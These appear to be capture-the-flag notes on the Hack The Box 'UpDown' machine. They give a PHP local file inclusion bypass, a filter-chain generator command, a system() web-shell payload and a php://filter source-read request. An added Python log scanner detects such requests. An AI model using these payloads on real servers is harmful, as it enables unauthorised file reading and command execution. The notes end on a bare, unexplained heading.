Source Code

LFI

UpDown HTB

  • Direct access is set to false

  • Reads the page parameter from the request

  • If the page value doesn't contain /bin, usr, home, var, etc

  • Then it calls include on the page variable with .php appended (on any file)

  • Else, it includes checker.php

RCE via PHP filters

It's possible to get command execution just through $_GET['page']

python3 php_filter_chain_generator.py --chain "<?php phpinfo(); ?>"

Take the output and append it to /?page=

If system isn't a disabled function, this can be used as the chain payload instead:

<?php system($_GET["cmd"]); ?>

Reading Local Files

We can pull the index.php file, encoded in base64, by using this wrapper in the GET request. The include appends .php, so resource=index resolves to index.php:

/?page=php://filter/convert.base64-encode/resource=index
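A defender-side check for the two request shapes above, as an added example that is not part of the original notes: it scans access-log lines for stream wrappers in the page parameter and separates a single-filter file read from a long generated filter chain. The log lines, the threshold of 5 filters and all function names are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Stream wrappers that have no business in a page-name parameter.
WRAPPER = re.compile(r"^(?:(?:php|phar|zip|expect|file|glob|https?|ftp)://|data:)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CHAIN_THRESHOLD = 5  # assumed cut-off for "this is a generated chain"

def classify(page):
    """Label one decoded page value: None, 'wrapper', 'filter-read' or 'filter-chain'."""
    page = page.strip()
    if not WRAPPER.match(page):
        return None
    if not page.lower().startswith("php://filter"):
        return "wrapper"
    # Everything between php://filter and /resource= is the filter list,
    # with individual filters separated by '|' or '/'.
    spec = page[len("php://filter"):].split("/resource=")[0]
    filters = [f for f in re.split(r"[|/]", spec) if f]
    return "filter-chain" if len(filters) >= CHAIN_THRESHOLD else "filter-read"

def scan(lines, param="page"):
    """Return (line_number, label) for each suspicious request line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qs percent-decodes, so encoded chains are seen in clear form.
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query).get(param, []):
            label = classify(value)
            if label:
                findings.append((number, label))
    return findings

# Constructed sample lines (combined log format), not taken from a real host.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?page=checker HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 900',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /?page=php%3A%2F%2Ffilter%2Fconvert.iconv.UTF8.CSISO2022KR%7Cconvert.base64-encode%7Cconvert.iconv.UTF8.UTF7%7Cconvert.base64-decode%7Cconvert.base64-encode%7Cconvert.iconv.UTF8.UTF7%2Fresource%3Dphp%3A%2F%2Ftemp HTTP/1.1" 200 70000',
]

if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print(f"line {number}: {label}")
```

The keyword check in the source never looks at the scheme, which is why both flagged requests pass it; the same WRAPPER test applied before the include would reject them.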

Good example:

Authentication Bypass via strcmp in PHP
